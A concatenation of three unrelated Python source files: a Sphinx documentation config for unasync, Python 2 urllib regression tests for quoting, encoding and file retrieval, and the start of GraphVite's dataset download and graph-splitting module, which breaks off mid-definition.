extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.intersphinx",
"sphinx.ext.coverage",
"sphinx.ext.napoleon",
"sphinxcontrib_trio",
]
intersphinx_mapping = {
"python": ("https://docs.python.org/3", None),
"trio": ("https://trio.readthedocs.io/en/stable", None),
}
autodoc_member_order = "bysource"
# Add any paths that contain templates here, relative to this directory.
templates_path = []
# The suffix(es) of source filenames.
# You can specify multiple suffixes as a list of strings:
#
# source_suffix = ['.rst', '.md']
source_suffix = ".rst"
# The master toctree document.
master_doc = "index"
# General information about the project.
project = "unasync"
copyright = "The unasync authors"
author = "The unasync authors"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
import unasync
version = unasync.__version__
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# These patterns also affect html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# The default language for :: blocks
highlight_language = "python3"
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
# html_theme = 'alabaster'
# We have to set this ourselves, not only because it's useful for local
# testing, but also because if we don't then RTD will throw away our
# html_theme_options.
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
# default is 2
# show deeper nesting in the RTD theme's sidebar TOC
# https://stackoverflow.com/questions/27669376/
# I'm not 100% sure this actually does anything with our current
# versions/settings...
"navigation_depth": 4,
"logo_only": True,
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = "unasyncdoc"
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [(master_doc, "unasync.tex", "unasync Documentation", author, "manual")]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, "unasync", "unasync Documentation", [author], 1)]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"unasync",
"unasync Documentation",
author,
"unasync",
"The async transformation code.",
"Miscellaneous",
)
]
|
the-stack_0_1636 | """Regression tests for urllib"""
import urllib
import httplib
import unittest
from test import test_support
import os
import mimetools
import StringIO
def hexescape(char):
"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
"""Setup of a temp file to use for testing"""
self.text = "test_urllib: %s\n" % self.__class__.__name__
FILE = file(test_support.TESTFN, 'wb')
try:
FILE.write(self.text)
finally:
FILE.close()
self.pathname = test_support.TESTFN
self.returned_obj = urllib.urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(test_support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "__iter__"):
self.assert_(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual('', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assert_(isinstance(file_num, int),
"fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
        # Test close() by calling it here and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assert_(isinstance(self.returned_obj.info(), mimetools.Message))
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison
for line in self.returned_obj.__iter__():
self.assertEqual(line, self.text)
class urlopen_HttpTests(unittest.TestCase):
"""Test urlopen() opening a fake http connection."""
def fakehttp(self, fakedata):
class FakeSocket(StringIO.StringIO):
def sendall(self, str): pass
def makefile(self, mode, name): return self
def read(self, amt=None):
if self.closed: return ''
return StringIO.StringIO.read(self, amt)
def readline(self, length=None):
if self.closed: return ''
return StringIO.StringIO.readline(self, length)
class FakeHTTPConnection(httplib.HTTPConnection):
def connect(self):
self.sock = FakeSocket(fakedata)
assert httplib.HTTP._connection_class == httplib.HTTPConnection
httplib.HTTP._connection_class = FakeHTTPConnection
def unfakehttp(self):
httplib.HTTP._connection_class = httplib.HTTPConnection
def test_read(self):
self.fakehttp('Hello!')
try:
fp = urllib.urlopen("http://python.org/")
self.assertEqual(fp.readline(), 'Hello!')
self.assertEqual(fp.readline(), '')
finally:
self.unfakehttp()
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a temporary file.
self.text = 'testing urllib.urlretrieve'
FILE = file(test_support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
def tearDown(self):
# Delete the temporary file.
os.remove(test_support.TESTFN)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.urlretrieve("file:%s" % test_support.TESTFN)
self.assertEqual(result[0], test_support.TESTFN)
self.assert_(isinstance(result[1], mimetools.Message),
"did not get a mimetools.Message instance as second "
"returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % test_support.TESTFN
result = urllib.urlretrieve("file:%s" % test_support.TESTFN, second_temp)
self.assertEqual(second_temp, result[0])
self.assert_(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = file(second_temp, 'rb')
try:
text = FILE.read()
finally:
FILE.close()
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(count, block_size, total_size, count_holder=[0]):
self.assert_(isinstance(count, int))
self.assert_(isinstance(block_size, int))
self.assert_(isinstance(total_size, int))
self.assertEqual(count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % test_support.TESTFN
urllib.urlretrieve(test_support.TESTFN, second_temp, hooktester)
os.remove(second_temp)
class QuotingTests(unittest.TestCase):
"""Tests for urllib.quote() and urllib.quote_plus()
    According to RFC 2396 ("Uniform Resource Identifiers"), to escape a
character you write it as '%' + <2 character US-ASCII hex value>. The Python
code of ``'%' + hex(ord(<character>))[2:]`` escapes a character properly.
Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
# Make sure quote() does not quote letters, digits, and "_,.-"
do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-"])
result = urllib.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %s != %s" % (do_not_quote, result))
result = urllib.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %s != %s" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
self.assertEqual(urllib.quote.func_defaults[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %s != %s" % (quote_by_default, result))
result = urllib.quote_plus(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %s != %s" %
(quote_by_default, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append('<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): %s should be escaped to %s, not %s" %
(char, hexescape(char), result))
result = urllib.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %s != %s" % (expected, result))
        result = urllib.quote_plus(partial_quote)
        self.assertEqual(expected, result,
                         "using quote_plus(): %s != %s" % (expected, result))
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %s != %s" % (result, hexescape(' ')))
result = urllib.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %s != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.quote(given)
self.assertEqual(expect, result,
"using quote(): %s != %s" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %s != %s" % (expect, result))
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
    See the docstring for QuotingTests for details on quoting and such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
        result = urllib.unquote(escape_string)
        self.assertEqual(result.count('%'), 1,
                         "using unquote(): not all characters escaped; %s" %
                         result)
        result = urllib.unquote_plus(escape_string)
        self.assertEqual(result.count('%'), 1,
                         "using unquote_plus(): not all characters escaped: "
                         "%s" % result)
def test_unquoting_parts(self):
# Make sure unquoting works when have non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using quote(): %s != %s" % (expect, result))
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" % (expect, result))
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
Test cannot assume anything about order. Docs make no guarantee and
have possible dictionary input.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.urlencode(given)
for expected in expect_somewhere:
self.assert_(expected in result,
"testing %s: %s not found in %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assert_(on_amp_left.isdigit() and on_amp_right.isdigit(),
"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.quote_plus(str(['1', '2', '3']))
result = urllib.urlencode(given)
self.assertEqual(expect, result)
result = urllib.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assert_(expect in result,
"%s not found in %s" % (expect, result))
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
        # Test automatic quoting and unquoting works for pathname2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.quote("quot=ing")
result = urllib.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.quote("make sure")
result = urllib.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
def test_main():
test_support.run_unittest(
urlopen_FileTests,
urlopen_HttpTests,
urlretrieve_FileTests,
QuotingTests,
UnquotingTests,
urlencode_Tests,
Pathname_Tests
)
if __name__ == '__main__':
test_main()
|
the-stack_0_1637 | # Copyright 2019 MilaGraph. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Zhaocheng Zhu
"""
Dataset module of GraphVite
Graph
- :class:`BlogCatalog`
- :class:`Youtube`
- :class:`Flickr`
- :class:`Hyperlink2012`
- :class:`Friendster`
- :class:`Wikipedia`
Knowledge Graph
- :class:`Math`
- :class:`FB15k`
- :class:`FB15k237`
- :class:`WN18`
- :class:`WN18RR`
- :class:`Wikidata5m`
- :class:`Freebase`
Visualization
- :class:`MNIST`
- :class:`CIFAR10`
- :class:`ImageNet`
"""
from __future__ import absolute_import, division
import os
import glob
import shutil
import logging
import gzip, zipfile, tarfile
import multiprocessing
from collections import defaultdict
import numpy as np
from . import cfg
logger = logging.getLogger(__name__)
class Dataset(object):
"""
Graph dataset.
Parameters:
name (str): name of dataset
urls (dict, optional): url(s) for each split,
can be either str or list of str
members (dict, optional): zip member(s) for each split,
leave empty for default
Datasets contain several splits, such as train, valid and test.
For each split, there are one or more URLs, specifying the file to download.
You may also specify the zip member to extract.
When a split is accessed, it will be automatically downloaded and decompressed
if it is not present.
You can assign a preprocess for each split, by defining a function with name [split]_preprocess::
class MyDataset(Dataset):
def __init__(self):
super(MyDataset, self).__init__(
"my_dataset",
train="url/to/train/split",
test="url/to/test/split"
)
def train_preprocess(self, input_file, output_file):
with open(input_file, "r") as fin, open(output_file, "w") as fout:
fout.write(fin.read())
f = open(MyDataset().train)
If the preprocess returns a non-trivial value, then it is assigned to the split,
otherwise the file name is assigned.
By convention, only splits ending with ``_data`` have non-trivial return value.
See also:
Pre-defined preprocess functions
:func:`csv2txt`,
:func:`top_k_label`,
:func:`induced_graph`,
:func:`edge_split`,
:func:`link_prediction_split`,
:func:`image_feature_data`
"""
def __init__(self, name, urls=None, members=None):
self.name = name
self.urls = urls or {}
self.members = members or {}
for key in self.urls:
if isinstance(self.urls[key], str):
self.urls[key] = [self.urls[key]]
if key not in self.members:
self.members[key] = [None] * len(self.urls[key])
elif isinstance(self.members[key], str):
self.members[key] = [self.members[key]]
if len(self.urls[key]) != len(self.members[key]):
raise ValueError("Number of members is inconsistent with number of urls in `%s`" % key)
self.path = os.path.join(cfg.dataset_path, self.name)
def relpath(self, path):
return os.path.relpath(path, self.path)
def download(self, url):
from six.moves.urllib.request import urlretrieve
save_file = os.path.basename(url)
if "?" in save_file:
save_file = save_file[:save_file.find("?")]
save_file = os.path.join(self.path, save_file)
if save_file in self.local_files():
return save_file
logger.info("downloading %s to %s" % (url, self.relpath(save_file)))
urlretrieve(url, save_file)
return save_file
def extract(self, zip_file, member=None):
zip_name, extension = os.path.splitext(zip_file)
if zip_name.endswith(".tar"):
extension = ".tar" + extension
zip_name = zip_name[:-4]
if extension == ".txt":
return zip_file
elif member is None:
save_file = zip_name
else:
save_file = os.path.join(os.path.dirname(zip_name), os.path.basename(member))
if save_file in self.local_files():
return save_file
if extension == ".gz":
logger.info("extracting %s to %s" % (self.relpath(zip_file), self.relpath(save_file)))
with gzip.open(zip_file, "rb") as fin, open(save_file, "wb") as fout:
shutil.copyfileobj(fin, fout)
elif extension == ".tar.gz" or extension == ".tar":
if member is None:
logger.info("extracting %s to %s" % (self.relpath(zip_file), self.relpath(save_file)))
with tarfile.open(zip_file, "r") as fin:
fin.extractall(save_file)
else:
logger.info("extracting %s from %s to %s" % (member, self.relpath(zip_file), self.relpath(save_file)))
with tarfile.open(zip_file, "r").extractfile(member) as fin, open(save_file, "wb") as fout:
shutil.copyfileobj(fin, fout)
elif extension == ".zip":
if member is None:
logger.info("extracting %s to %s" % (self.relpath(zip_file), self.relpath(save_file)))
with zipfile.ZipFile(zip_file) as fin:
fin.extractall(save_file)
else:
logger.info("extracting %s from %s to %s" % (member, self.relpath(zip_file), self.relpath(save_file)))
with zipfile.ZipFile(zip_file).open(member, "r") as fin, open(save_file, "wb") as fout:
shutil.copyfileobj(fin, fout)
else:
raise ValueError("Unknown file extension `%s`" % extension)
return save_file
def get_file(self, key):
file_name = os.path.join(self.path, "%s_%s.txt" % (self.name, key))
if file_name in self.local_files():
return file_name
urls = self.urls[key]
members = self.members[key]
preprocess_name = key + "_preprocess"
preprocess = getattr(self, preprocess_name, None)
if len(urls) > 1 and preprocess is None:
raise AttributeError(
"There are non-trivial number of files, but function `%s` is not found" % preprocess_name)
extract_files = []
for url, member in zip(urls, members):
download_file = self.download(url)
extract_file = self.extract(download_file, member)
extract_files.append(extract_file)
if preprocess:
result = preprocess(*(extract_files + [file_name]))
if result is not None:
return result
elif os.path.isfile(extract_files[0]):
logger.info("renaming %s to %s" % (self.relpath(extract_files[0]), self.relpath(file_name)))
shutil.move(extract_files[0], file_name)
else:
raise AttributeError(
"There are non-trivial number of files, but function `%s` is not found" % preprocess_name)
return file_name
def local_files(self):
if not os.path.exists(self.path):
os.mkdir(self.path)
return set(glob.glob(os.path.join(self.path, "*")))
def __getattr__(self, key):
if key in self.__dict__:
return self.__dict__[key]
if key in self.urls:
return self.get_file(key)
raise AttributeError("Can't resolve split `%s`" % key)
def csv2txt(self, csv_file, txt_file):
"""
Convert ``csv`` to ``txt``.
Parameters:
csv_file: csv file
txt_file: txt file
"""
logger.info("converting %s to %s" % (self.relpath(csv_file), self.relpath(txt_file)))
with open(csv_file, "r") as fin, open(txt_file, "w") as fout:
for line in fin:
fout.write(line.replace(",", "\t"))
def top_k_label(self, label_file, save_file, k, format="node-label"):
"""
Extract top-k labels.
Parameters:
label_file (str): label file
save_file (str): save file
k (int): top-k labels will be extracted
format (str, optional): format of label file,
can be 'node-label' or '(label)-nodes':
- **node-label**: each line is [node] [label]
- **(label)-nodes**: each line is [node]..., no explicit label
"""
logger.info("extracting top-%d labels of %s to %s" % (k, self.relpath(label_file), self.relpath(save_file)))
if format == "node-label":
label2nodes = defaultdict(list)
with open(label_file, "r") as fin:
for line in fin:
node, label = line.split()
label2nodes[label].append(node)
elif format == "(label)-nodes":
label2nodes = {}
with open(label_file, "r") as fin:
for i, line in enumerate(fin):
label2nodes[i] = line.split()
else:
raise ValueError("Unknown file format `%s`" % format)
labels = sorted(label2nodes, key=lambda x: len(label2nodes[x]), reverse=True)[:k]
with open(save_file, "w") as fout:
for label in sorted(labels):
for node in sorted(label2nodes[label]):
fout.write("%s\t%s\n" % (node, label))
def induced_graph(self, graph_file, label_file, save_file):
"""
        Induce a subgraph from labeled nodes. Both endpoints of every edge in the induced graph are labeled nodes.
Parameters:
graph_file (str): graph file
label_file (str): label file
save_file (str): save file
"""
logger.info("extracting subgraph of %s induced by %s to %s" %
(self.relpath(graph_file), self.relpath(label_file), self.relpath(save_file)))
nodes = set()
with open(label_file, "r") as fin:
for line in fin:
nodes.update(line.split())
with open(graph_file, "r") as fin, open(save_file, "w") as fout:
for line in fin:
if not line.startswith("#"):
u, v = line.split()
if u not in nodes or v not in nodes:
continue
fout.write("%s\t%s\n" % (u, v))
def edge_split(self, graph_file, files, portions):
"""
Divide a graph into several splits.
Parameters:
graph_file (str): graph file
files (list of str): file names
portions (list of float): split portions
"""
assert len(files) == len(portions)
logger.info("splitting graph %s into %s" %
(self.relpath(graph_file), ", ".join([self.relpath(file) for file in files])))
np.random.seed(1024)
portions = np.cumsum(portions, dtype=np.float32) / np.sum(portions)
files = [open(file, "w") for file in files]
with open(graph_file, "r") as fin:
for line in fin:
i = np.searchsorted(portions, np.random.rand())
files[i].write(line)
for file in files:
file.close()
def link_prediction_split(self, graph_file, files, portions):
"""
Divide a normal graph into a train split and several test splits for link prediction use.
Each test split contains half true and half false edges.
Parameters:
graph_file (str): graph file
files (list of str): file names,
the first file is treated as train file
portions (list of float): split portions
"""
assert len(files) == len(portions)
logger.info("splitting graph %s into %s" %
(self.relpath(graph_file), ", ".join([self.relpath(file) for file in files])))
np.random.seed(1024)
nodes = set()
edges = set()
portions = np.cumsum(portions, dtype=np.float32) / np.sum(portions)
files = [open(file, "w") for file in files]
num_edges = [0] * len(files)
with open(graph_file, "r") as fin:
for line in fin:
u, v = line.split()[:2]
nodes.update([u, v])
edges.add((u, v))
i = np.searchsorted(portions, np.random.rand())
if i == 0:
files[i].write(line)
else:
files[i].write("%s\t%s\t1\n" % (u, v))
num_edges[i] += 1
nodes = list(nodes)
for file, num_edge in zip(files[1:], num_edges[1:]):
for _ in range(num_edge):
valid = False
while not valid:
u = nodes[int(np.random.rand() * len(nodes))]
v = nodes[int(np.random.rand() * len(nodes))]
valid = u != v and (u, v) not in edges and (v, u) not in edges
file.write("%s\t%s\t0\n" % (u, v))
for file in files:
file.close()
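    # Output sketch: the first (train) split keeps the raw edge lines, while each
    # remaining split mixes positive and sampled negative edges with a 0/1 label:
    #   u1    v1    1
    #   u3    v7    0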
def image_feature_data(self, dataset, model="resnet50", batch_size=128):
"""
Compute feature vectors for an image dataset using a neural network.
Parameters:
dataset (torch.utils.data.Dataset): dataset
model (str or torch.nn.Module, optional): pretrained model.
                If it is a str, use the output of the last hidden layer of that model.
batch_size (int, optional): batch size
"""
import torch
import torchvision
from torch import nn
logger.info("computing %s feature" % model)
if isinstance(model, str):
full_model = getattr(torchvision.models, model)(pretrained=True)
model = nn.Sequential(*list(full_model.children())[:-1])
num_worker = multiprocessing.cpu_count()
data_loader = torch.utils.data.DataLoader(dataset,
batch_size=batch_size, num_workers=num_worker, shuffle=False)
model = model.cuda()
model.eval()
features = []
with torch.no_grad():
for i, (batch_images, batch_labels) in enumerate(data_loader):
if i % 100 == 0:
logger.info("%g%%" % (100.0 * i * batch_size / len(dataset)))
batch_images = batch_images.cuda()
batch_features = model(batch_images).view(batch_images.size(0), -1).cpu().numpy()
features.append(batch_features)
features = np.concatenate(features)
return features
class BlogCatalog(Dataset):
"""
BlogCatalog social network dataset.
Splits:
graph, label, train, test
Train and test splits are used for link prediction purpose.
"""
def __init__(self):
super(BlogCatalog, self).__init__(
"blogcatalog",
urls={
"graph": "http://socialcomputing.asu.edu/uploads/1283153973/BlogCatalog-dataset.zip",
"label": "http://socialcomputing.asu.edu/uploads/1283153973/BlogCatalog-dataset.zip",
"train": [], # depends on `graph`
"valid": [], # depends on `graph`
"test": [] # depends on `graph`
},
members={
"graph": "BlogCatalog-dataset/data/edges.csv",
"label": "BlogCatalog-dataset/data/group-edges.csv"
}
)
def graph_preprocess(self, raw_file, save_file):
self.csv2txt(raw_file, save_file)
def label_preprocess(self, raw_file, save_file):
self.csv2txt(raw_file, save_file)
def train_preprocess(self, train_file):
valid_file = train_file[:train_file.rfind("train.txt")] + "valid.txt"
test_file = train_file[:train_file.rfind("train.txt")] + "test.txt"
self.link_prediction_split(self.graph, [train_file, valid_file, test_file], portions=[100, 1, 1])
def valid_preprocess(self, valid_file):
train_file = valid_file[:valid_file.rfind("valid.txt")] + "train.txt"
test_file = valid_file[:valid_file.rfind("valid.txt")] + "test.txt"
self.link_prediction_split(self.graph, [train_file, valid_file, test_file], portions=[100, 1, 1])
def test_preprocess(self, test_file):
train_file = test_file[:test_file.rfind("test.txt")] + "train.txt"
valid_file = test_file[:test_file.rfind("test.txt")] + "valid.txt"
self.link_prediction_split(self.graph, [train_file, valid_file, test_file], portions=[100, 1, 1])
class Youtube(Dataset):
"""
Youtube social network dataset.
Splits:
graph, label
"""
def __init__(self):
super(Youtube, self).__init__(
"youtube",
urls={
"graph": "http://socialnetworks.mpi-sws.mpg.de/data/youtube-links.txt.gz",
"label": "http://socialnetworks.mpi-sws.mpg.de/data/youtube-groupmemberships.txt.gz"
}
)
def label_preprocess(self, raw_file, save_file):
self.top_k_label(raw_file, save_file, k=47)
class Flickr(Dataset):
"""
Flickr social network dataset.
Splits:
graph, label
"""
def __init__(self):
super(Flickr, self).__init__(
"flickr",
urls={
"graph": "http://socialnetworks.mpi-sws.mpg.de/data/flickr-links.txt.gz",
"label": "http://socialnetworks.mpi-sws.mpg.de/data/flickr-groupmemberships.txt.gz"
}
)
def label_preprocess(self, label_file, save_file):
self.top_k_label(label_file, save_file, k=5)
class Hyperlink2012(Dataset):
"""
Hyperlink 2012 graph dataset.
Splits:
pld_train, pld_test
"""
def __init__(self):
super(Hyperlink2012, self).__init__(
"hyperlink2012",
urls={
"pld_train": "http://data.dws.informatik.uni-mannheim.de/hyperlinkgraph/2012-08/pld-arc.gz",
"pld_valid": "http://data.dws.informatik.uni-mannheim.de/hyperlinkgraph/2012-08/pld-arc.gz",
"pld_test": "http://data.dws.informatik.uni-mannheim.de/hyperlinkgraph/2012-08/pld-arc.gz"
}
)
def pld_train_preprocess(self, graph_file, train_file):
valid_file = train_file[:train_file.rfind("pld_train.txt")] + "pld_valid.txt"
test_file = train_file[:train_file.rfind("pld_train.txt")] + "pld_test.txt"
self.link_prediction_split(graph_file, [train_file, valid_file, test_file], portions=[10000, 1, 1])
def pld_valid_preprocess(self, graph_file, valid_file):
train_file = valid_file[:valid_file.rfind("pld_valid.txt")] + "pld_train.txt"
test_file = valid_file[:valid_file.rfind("pld_valid.txt")] + "pld_test.txt"
self.link_prediction_split(graph_file, [train_file, valid_file, test_file], portions=[10000, 1, 1])
def pld_test_preprocess(self, graph_file, test_file):
train_file = test_file[:test_file.rfind("pld_test.txt")] + "pld_train.txt"
valid_file = test_file[:test_file.rfind("pld_test.txt")] + "pld_valid.txt"
self.link_prediction_split(graph_file, [train_file, valid_file, test_file], portions=[10000, 1, 1])
class Friendster(Dataset):
"""
Friendster social network dataset.
Splits:
graph, small_graph, label
"""
def __init__(self):
super(Friendster, self).__init__(
"friendster",
urls={
"graph": "https://snap.stanford.edu/data/bigdata/communities/com-friendster.ungraph.txt.gz",
"small_graph": ["https://snap.stanford.edu/data/bigdata/communities/com-friendster.ungraph.txt.gz",
"https://snap.stanford.edu/data/bigdata/communities/com-friendster.all.cmty.txt.gz"],
